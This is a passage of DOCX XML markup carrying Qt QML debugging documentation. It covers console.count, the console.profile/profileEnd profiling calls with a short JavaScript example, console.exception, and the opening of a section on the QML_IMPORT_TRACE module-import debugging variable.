          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"f called"</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>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162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will print</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f called: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f called: 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>... whenever</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f()</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2736" w:name="profile"/>
      <w:bookmarkStart w:id="2737" w:name="_Toc483604463"/>
      <w:bookmarkStart w:id="2738" w:name="_Toc483605683"/>
      <w:bookmarkEnd w:id="2736"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2737"/>
      <w:bookmarkEnd w:id="2738"/>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3613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.profile</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>turns on the QML and JavaScript profilers</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nested calls are not supported</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a warning will be printed to the console.</w:t>
      </w:r>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3613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.profileEnd</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>turns off the QML and JavaScript profilers</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Calling this function without a previous call to console.profile will print a </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>warning</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the console. </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A profiling client should have been attached before this call to receive and store the profiling data</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00385670" w:rsidRDefault="00162275" w:rsidP="00162275">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385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00385670" w:rsidRDefault="00162275" w:rsidP="00162275">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385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//Call some function that needs to be profiled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00385670" w:rsidRDefault="00162275" w:rsidP="00162275">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385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//Ensure that a client is attached before ending</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00385670" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//the profiling session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00385670" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    console</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>profileEnd</w:t>
      </w:r>
      <w:r w:rsidRPr="00385670">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2739" w:name="exception"/>
      <w:bookmarkStart w:id="2740" w:name="_Toc483604464"/>
      <w:bookmarkStart w:id="2741" w:name="_Toc483605684"/>
      <w:bookmarkEnd w:id="2739"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2740"/>
      <w:bookmarkEnd w:id="2741"/>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3613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.exception</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prints an error message together with the stack trace of JavaScript execution at the point where it is called</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2742" w:name="debugging-module-imports"/>
      <w:bookmarkStart w:id="2743" w:name="_Toc483604465"/>
      <w:bookmarkStart w:id="2744" w:name="_Toc483605685"/>
      <w:bookmarkEnd w:id="2742"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Debugging Module Imports</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2743"/>
      <w:bookmarkEnd w:id="2744"/>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color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML_IMPORT_TRACE</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
